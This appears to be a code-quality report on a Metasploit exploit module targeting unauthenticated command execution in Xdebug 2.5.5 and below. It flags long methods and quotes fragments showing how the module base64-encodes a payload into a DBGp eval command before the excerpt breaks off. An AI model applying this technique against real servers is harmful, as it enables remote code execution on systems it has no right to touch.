modules/exploits/unix/http/xdebug_unauth_exec.rb
Method `initialize` has 35 lines of code (exceeds 25 allowed). Consider refactoring.
def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
Method `exploit` has 34 lines of code (exceeds 25 allowed). Consider refactoring.
def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"
webserver = Thread.new do
begin